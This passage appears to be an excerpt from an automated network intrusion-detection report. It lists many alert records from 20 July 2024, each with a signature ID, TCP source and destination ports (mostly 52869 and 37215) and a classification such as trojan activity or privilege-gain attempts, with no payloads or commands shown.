                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.909217
                      SID:2027339
                      Source Port:53072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.417957
                      SID:2831300
                      Source Port:55222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.055924
                      SID:2831300
                      Source Port:46612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.581336
                      SID:2025132
                      Source Port:35868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.450149
                      SID:2027339
                      Source Port:33508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.409616
                      SID:2027339
                      Source Port:40444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.342828
                      SID:2831300
                      Source Port:45828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:23.248398
                      SID:2027339
                      Source Port:46068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2829579
                      Source Port:49276
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.364513
                      SID:2831300
                      Source Port:60172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.245741
                      SID:2829579
                      Source Port:40508
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.930679
                      SID:2027339
                      Source Port:43048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.865744
                      SID:2027339
                      Source Port:34034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.800446
                      SID:2829579
                      Source Port:32800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.818180
                      SID:2025132
                      Source Port:36236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.295378
                      SID:2025132
                      Source Port:54198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:04.458817
                      SID:2027339
                      Source Port:57724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.612058
                      SID:2025132
                      Source Port:54170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.438139
                      SID:2027339
                      Source Port:47762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.027779
                      SID:2025132
                      Source Port:52926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.468125
                      SID:2831300
                      Source Port:40514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.992160
                      SID:2025132
                      Source Port:39026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.939285
                      SID:2027339
                      Source Port:36320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2835222
                      Source Port:37552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.931996
                      SID:2025132
                      Source Port:60762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.542864
                      SID:2027339
                      Source Port:52072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.524062
                      SID:2831300
                      Source Port:58508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.342078
                      SID:2025132
                      Source Port:43166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.530339
                      SID:2025132
                      Source Port:50028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:42.331305
                      SID:2027339
                      Source Port:36822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2829579
                      Source Port:33958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.685689
                      SID:2025132
                      Source Port:58514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2835222
                      Source Port:39396
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.287494
                      SID:2027339
                      Source Port:55462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2835222
                      Source Port:40008
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.310648
                      SID:2025132
                      Source Port:35356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.427717
                      SID:2027339
                      Source Port:59728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.643171
                      SID:2027339
                      Source Port:54606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.765891
                      SID:2835222
                      Source Port:38602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.526744
                      SID:2831300
                      Source Port:52730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.613195
                      SID:2025132
                      Source Port:54202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:03.190387
                      SID:2831300
                      Source Port:44998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.247850
                      SID:2027339
                      Source Port:34394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.262794
                      SID:2025132
                      Source Port:36568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.702332
                      SID:2025132
                      Source Port:36334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.881095
                      SID:2027339
                      Source Port:56564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.529212
                      SID:2027339
                      Source Port:53506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.889998
                      SID:2829579
                      Source Port:44906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.247483
                      SID:2025132
                      Source Port:50706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:51.585302
                      SID:2025132
                      Source Port:51104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2835222
                      Source Port:60610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.589035
                      SID:2027339
                      Source Port:35032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.536919
                      SID:2025132
                      Source Port:58858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:06.736138
                      SID:2829579
                      Source Port:49652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.958429
                      SID:2025132
                      Source Port:33640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.610603
                      SID:2025132
                      Source Port:43604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.055828
                      SID:2027339
                      Source Port:51382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.326250
                      SID:2027339
                      Source Port:46592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:40.959334
                      SID:2027339
                      Source Port:45534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.039721
                      SID:2829579
                      Source Port:43334
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.771185
                      SID:2027339
                      Source Port:51974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.864515
                      SID:2027339
                      Source Port:49328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.714639
                      SID:2027339
                      Source Port:56280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.034462
                      SID:2025132
                      Source Port:50470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.842190
                      SID:2025132
                      Source Port:38162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.458812
                      SID:2831300
                      Source Port:58370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.478948
                      SID:2831300
                      Source Port:42398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.556659
                      SID:2025132
                      Source Port:55336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.531304
                      SID:2831300
                      Source Port:52072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:42.331305
                      SID:2025132
                      Source Port:36822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:23.347168
                      SID:2025132
                      Source Port:53288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.525575
                      SID:2831300
                      Source Port:45574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2829579
                      Source Port:56752
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.597370
                      SID:2025132
                      Source Port:40440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.237594
                      SID:2025132
                      Source Port:35034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.922651
                      SID:2025132
                      Source Port:39830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.530128
                      SID:2027339
                      Source Port:51908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.601492
                      SID:2027339
                      Source Port:47486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.540063
                      SID:2025132
                      Source Port:40402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.460913
                      SID:2831300
                      Source Port:42640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.535822
                      SID:2027339
                      Source Port:49902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.187903
                      SID:2027339
                      Source Port:37684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.465472
                      SID:2831300
                      Source Port:36236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.147952
                      SID:2027339
                      Source Port:50690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.610263
                      SID:2831300
                      Source Port:42022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.334659
                      SID:2831300
                      Source Port:59578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.467316
                      SID:2027339
                      Source Port:44638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2829579
                      Source Port:43990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.746633
                      SID:2027339
                      Source Port:54162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.939710
                      SID:2025132
                      Source Port:35850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.614327
                      SID:2025132
                      Source Port:38970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:31.522075
                      SID:2027339
                      Source Port:41466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.417626
                      SID:2027339
                      Source Port:59632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.139331
                      SID:2027339
                      Source Port:52266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:27.998136
                      SID:2027339
                      Source Port:56590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.523834
                      SID:2027339
                      Source Port:48322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.803048
                      SID:2027339
                      Source Port:45114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2829579
                      Source Port:52160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.378063
                      SID:2027339
                      Source Port:52744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.164913
                      SID:2027339
                      Source Port:59290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.032993
                      SID:2027339
                      Source Port:60092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.331312
                      SID:2027339
                      Source Port:38018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.391870
                      SID:2025132
                      Source Port:54064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:07.844201
                      SID:2025132
                      Source Port:52172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.657263
                      SID:2835222
                      Source Port:34452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.526908
                      SID:2829579
                      Source Port:39224
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.055828
                      SID:2025132
                      Source Port:48716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.246694
                      SID:2025132
                      Source Port:45684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.622609
                      SID:2829579
                      Source Port:50928
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.065904
                      SID:2835222
                      Source Port:51738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.327654
                      SID:2027339
                      Source Port:59384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.424851
                      SID:2835222
                      Source Port:54286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.485640
                      SID:2027339
                      Source Port:34472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.068836
                      SID:2027339
                      Source Port:36874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.125782
                      SID:2829579
                      Source Port:59380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.303495
                      SID:2027339
                      Source Port:40018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.052134
                      SID:2027339
                      Source Port:58324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2835222
                      Source Port:39120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.341196
                      SID:2027339
                      Source Port:59280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.199501
                      SID:2027339
                      Source Port:54394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.685807
                      SID:2829579
                      Source Port:33524
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.280739
                      SID:2025132
                      Source Port:47762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.315621
                      SID:2027339
                      Source Port:56206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.863188
                      SID:2027339
                      Source Port:51356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.570741
                      SID:2027339
                      Source Port:32830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.430318
                      SID:2025132
                      Source Port:37864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.257476
                      SID:2829579
                      Source Port:37942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.572723
                      SID:2027339
                      Source Port:46950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.470552
                      SID:2027339
                      Source Port:52964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.003958
                      SID:2025132
                      Source Port:48904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.468948
                      SID:2831300
                      Source Port:48002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:55.858612
                      SID:2835222
                      Source Port:44672
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.327173
                      SID:2027339
                      Source Port:48532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.121210
                      SID:2829579
                      Source Port:47038
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2829579
                      Source Port:46556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.348370
                      SID:2025132
                      Source Port:50298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.052134
                      SID:2027339
                      Source Port:36036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440953
                      SID:2027339
                      Source Port:39374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.404785
                      SID:2835222
                      Source Port:47526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.610603
                      SID:2831300
                      Source Port:49606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.400253
                      SID:2025132
                      Source Port:44972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.412131
                      SID:2835222
                      Source Port:47854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.572816
                      SID:2027339
                      Source Port:53414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.018611
                      SID:2025132
                      Source Port:32964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:22.982491
                      SID:2025132
                      Source Port:47852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.211354
                      SID:2027339
                      Source Port:50532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.675612
                      SID:2025132
                      Source Port:50026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.195412
                      SID:2027339
                      Source Port:38580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.720163
                      SID:2027339
                      Source Port:44350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440249
                      SID:2027339
                      Source Port:57758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.466916
                      SID:2025132
                      Source Port:36156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.241818
                      SID:2027339
                      Source Port:38168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.652423
                      SID:2835222
                      Source Port:46008
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.468494
                      SID:2831300
                      Source Port:36152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.130839
                      SID:2025132
                      Source Port:44556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.534811
                      SID:2835222
                      Source Port:52304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.244191
                      SID:2027339
                      Source Port:54764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.373997
                      SID:2831300
                      Source Port:41662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.449219
                      SID:2025132
                      Source Port:56624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.462908
                      SID:2831300
                      Source Port:33822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.349447
                      SID:2027339
                      Source Port:49874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2829579
                      Source Port:42528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.557906
                      SID:2831300
                      Source Port:41260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.361832
                      SID:2027339
                      Source Port:39726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.102064
                      SID:2025132
                      Source Port:53196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:19.646919
                      SID:2027339
                      Source Port:55558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.644841
                      SID:2835222
                      Source Port:51668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343632
                      SID:2835222
                      Source Port:48596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.123973
                      SID:2831300
                      Source Port:39268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.747598
                      SID:2831300
                      Source Port:50210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.410737
                      SID:2027339
                      Source Port:46064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.693281
                      SID:2835222
                      Source Port:48024
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.682267
                      SID:2027339
                      Source Port:49086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.197560
                      SID:2027339
                      Source Port:60184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.610184
                      SID:2025132
                      Source Port:33262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.014684
                      SID:2835222
                      Source Port:52184
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.476343
                      SID:2831300
                      Source Port:36368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.793806
                      SID:2027339
                      Source Port:51786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:07.975226
                      SID:2027339
                      Source Port:35966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.354373
                      SID:2835222
                      Source Port:43462
                      Destination Port:37215
                      Protocol:TCP
